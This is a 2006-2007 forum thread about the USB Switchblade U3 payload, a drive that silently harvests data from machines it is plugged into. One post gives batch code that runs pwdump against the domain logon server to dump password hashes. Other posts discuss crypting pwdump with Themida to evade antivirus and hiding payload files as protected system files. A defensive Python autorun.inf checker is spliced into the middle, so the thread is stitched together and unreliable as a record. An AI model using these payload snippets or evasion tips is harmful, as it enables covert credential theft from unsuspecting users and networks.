G-Stress, Posted November 1, 2006
@msoule xXxellent :D I knew somebody else out there would find a way. Now if only I can make RDP stealth. Thanks man.

Matrix61312, Posted November 2, 2006
Hey, does anybody know where I can download an OSX version of the U3 loader for a SanDisk flash drive?

tonyintn, Posted November 10, 2006
New here and have been reading the posts but can't find an answer to a question that was asked earlier in this forum.
Question: I am interested in trying the payload but would like to know, if I try one of the payloads, can I load my U3 options back if I choose to go back to the original setting for my U3 drive? Thanks

SomeoneE1se, Posted November 10, 2006
I THINK THINK all of them. Just back up the drive before you start, and when you want to change the drive back to normal U3, just replace the backup you made, delete the launchpad .iso file and run the updater again, and it should update from the internet. But I might be wrong about this and you should get a second opinion.

renegadecanuck, Posted November 10, 2006
Yes, SomeoneElse, that is correct. I've swapped between U3 and Payload many times now (mostly in my attempt to create U3 compatible loaders and the like).

tonyintn, Posted November 10, 2006
cool thanks

Shiva, Posted November 11, 2006
Nod32, with updated AV signatures, detects amish's Payload :?

msoule, Posted November 22, 2006
A few of you may find this handy. I made this little routine for the end of my batch file. It time and date stamps the log file. I had to tinker around with a few other aspects of the original go.cmd file in order to get it to work right. If you have issues let me know and I'll post my whole bat.

    if not exist documents\logfiles\temp md documents\logfiles\temp
    move Documents\logfiles\%computername%_load.log Documents\logfiles\temp
    FOR /F "usebackq tokens=1" %%n IN (`dir Documents\logfiles\temp /b`) DO @FOR /F "usebackq tokens=2,3,4 delims=/ " %%d IN (`date /t`) DO @FOR /F "usebackq tokens=1,2 delims=: " %%t IN (`time /t`) DO @ren Documents\logfiles\temp\%%n %computername%-%%d%%e%%f-%%t%%u.log
    move Documents\logfiles\temp\* Documents\logfiles
    rd Documents\logfiles\temp

msoule, Posted November 22, 2006
Here's another little mod. Not too glamorous but handy. This will check to see if the user is logged on to a domain server. If so, pwdump will run against the logonserver and dump the PWs from there. This will ONLY work if the logged on user has DomainAdmin rights. If the user does not have these rights the attempt will fail and WILL generate an event in the Security Log of the server. Also, I recommend using PWDump6 to avoid LSASS errors on the server. I have had LSASS crashes in my lab with previous PWDump versions but never with v6. Use with care.

    @echo ==================================================[Dump Server SAM] >> Documents\logfiles\%computername%_load.log 2>&1
    @if not %LOGONSERVER%==%COMPUTERNAME% .\pwdump %LOGONSERVER% >> Documents\logfiles\%computername%_load.log 2>&1
    @if %LOGONSERVER%==%COMPUTERNAME% @echo Logged on to local machine. Process skipped. >> Documents\logfiles\%computername%_load.log 2>&1
    @echo ==================================================[Dump END Server SAM] >> Documents\logfiles\%computername%_load.log 2>&1

secret_squirrel, Posted November 23, 2006
Just set up the max damage version. Works great!! I get an error asking me to report the problem to somewhere@oreans.com. I expect it is a pwdump error. Anyone else get this?

moonlit, Posted November 23, 2006
Uh... Oreans, eh? Funny... what's in that package?

secret_squirrel, Posted November 23, 2006
Themida / Orean technologies. Maybe this is what was used to goof the file sigs for pwdump. I am running the encrypted version of the site. I can't recall the author's name, sorry. It only happens on the testtop.
I am currently tweaking the payload for assessment purposes. I plan to have a second set of files to reverse everything left by Switchblade. Maybe a second USB stick in the future..... One to exploit and one to clean up the mess...... Red or Blue pill? :) If I come up with anything interesting I will be sure to share.
Great site!!!!! Plenty of projects to play with here ;) 8)

ChevronX, Posted November 30, 2006
Just to let you guys know, I was a noob and plugged in my drive at work without thinking (as I usually use Windows XP and it asks if you want to open the folder, as it's non-U3), and it was a Windows 2000 machine. Switchblade ran automatically and folding@home slowed the network down to a crawl. We spent days, even after running the antidote, trying to fix it, and since it was a computer shop / netcafe it didn't go down well, so just letting you guys know.

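Added example, not part of the thread or of any poster's code: a defender-side check that reads a removable volume's autorun.inf before the drive is plugged into a production machine and reports entries that launch executable or script content, which is what ran unprompted on the Windows 2000 box described above. The key names are the standard autorun.inf launch keys; the sample file contents are constructed, reusing only the go.cmd and go.vbe file names mentioned in this thread.

```python
import re

# Extensions the Windows shell will execute or hand to a script host.
RISKY_EXT = (".exe", ".com", ".bat", ".cmd", ".vbs", ".vbe",
             ".js", ".jse", ".wsf", ".scr", ".pif")
# autorun.inf keys that start a program when the volume is mounted or opened.
LAUNCH_KEYS = ("open", "shellexecute")
VERB_KEY = re.compile(r"shell\\[^\\]+\\command")


def audit_autorun(text):
    """Return (key, command, risky_targets) for each launch entry in [autorun]."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()   # section names are case-insensitive
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, command = (part.strip() for part in line.split("=", 1))
        key = key.lower()
        if key not in LAUNCH_KEYS and not VERB_KEY.fullmatch(key):
            continue                      # icon=, label= and similar do not launch anything
        tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command)]
        risky = [t for t in tokens if t.lower().endswith(RISKY_EXT)]
        if risky:
            findings.append((key, command, risky))
    return findings


# Constructed sample input (not taken from any real drive).
SAMPLE = r"""
[AutoRun]
; constructed for this example
icon=drive.ico
label=Removable Disk
open=go.cmd
shell\Open\command="go.vbe"
"""

BENIGN = "[autorun]\nicon=drive.ico\nlabel=Backup\n"

if __name__ == "__main__":
    for key, command, risky in audit_autorun(SAMPLE):
        print(f"{key}: {command} -> {', '.join(risky)}")
```
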
likeachild, Posted December 21, 2006
I installed the maxdamage payload, but trendmicro is detecting a Trojan.Rootkit when it runs.
%windir%/system32/oreans.sys
Anybody else get this?

majk, Posted December 21, 2006
"I installed the maxdamage payload, but trendmicro is detecting a Trojan.Rootkit when it runs. %windir%/system32/oreans.sys anybody else get this?"
As mentioned above, Themida, which uses the oreans.sys file, is what is used to make pwdump get past anti-virus programs. There are other crypters for files that don't rely on external dll:s like that, but eventually these things get detected by the anti-virus vendors.
http://www.oreans.com/

tester134, Posted January 11, 2007
Hey everyone, this is my first post here. I just got a U3 Kingston drive, and I'm trying to run the Max Damage technique. On the Wiki it says that if I don't have a SanDisk or Memorex U3 drive, I need to download the U3 LaunchPad Hacker. I tried to download it but the link was broken. What should I do? Can someone please help me? Thanks a lot guyz.

twist3r, Posted January 28, 2007
On my switchblade, on about 1/2 the computers I plug it into I get a "drive not found/detected" or similar error with a continue/retry/cancel option. I have this error on both the vbs based U3 launcher and the batch file based launcher (the one that is on the CD partition and searches for the USB partition). Any ideas why this is? It's not very anonymous when it does that.

twist3r, Posted January 31, 2007
^ It appears that what is happening is that the cdrom partition of U3 takes the first available drive letter (G in this case) while the flash partition tries to take the next letter (H). However, in the network I'm on, there is an H drive already there! Going into the management console -> disc manager I can locate the flash partition and give it a different drive letter, but this defeats the automation!! Is there a way to get the flash drive to just take the next available letter and not try to force the next letter from the cdrom?

advanced, Posted February 1, 2007
Same problem happens for me as it does for twist3r. The CDROM portion shows up, but the flash drive isn't available unless settings are changed. Any ideas on how to change the letter assignment automatically? (It's a U3 problem.)
One other thing that's half related: How do you make files not just "hidden", but into "protected operating system files"? That way, it's a little harder to make any of them visible, and they still run. I've managed to make folders that are protected by copying the RECYCLER folder, but I'm not sure how to change that on individual files. Any help?

twist3r, Posted February 1, 2007
@advanced I use http://www.febooti.com/products/filetweak/ to change the file attributes to system files!
Yes, resolving the drive letter problem is becoming very important to me! Even for regular U3 drives my school computers mess them up; this is becoming a growing problem!

CyberSpike, Posted February 7, 2007
I'm using the 2GB memorex minitravel drive. Is there any way to back up the memorex U3 launchpad so I can use it normally again after installing switchblade?

n00berster, Posted February 22, 2007
Hey, I'm having problems with the maxdamage switchblade. It doesn't seem to autorun. It works fine if I manually click on go.vbe, but I can't get it to run automatically. Can anybody tell me how to fix this?

Sergius, Posted March 9, 2007
0_0

Obi-Wahn, Posted May 2, 2007
Hey. I've bought a 4 Gig Toshiba U3 drive. I've wanted to try Switchblade but it seems that the HAK5 wiki is down?!? So maybe anyone could upload a zip package on a filehoster or PM me for email?
Thx
Obi-Wahn

manimal, Posted May 6, 2007
Yea, I'm hoping it comes back soon too.. I want to try this out.. I like what the latest episode has for USB trickery (2x10), going to rewatch it tonight at work when things get quiet..
On a side note, has anyone heard anything about this little device? http://www.subrosasoft.com/OSXSoftware/ind...products_id=195 (probably a dumb question).. Now, I haven't read through the 25 pages of this thread yet, so I apologize for a repost, but I'm curious as to how similar/different it is from the ongoing project here.. perhaps a future implementation into this project?
EDIT - I went on google and found this link.. its reference is HAK5, and it has all the USB hacks on it.. here's the one for the switchblade: http://www.usbhacks.com/2006/10/07/usb-switchblade/
Edit #2 - so the loader works, and the iso works, but they don't include the payload for the regular partition of the drive.. so I guess I'll have to keep waiting.. I don't know how to use the code.. such a n00b...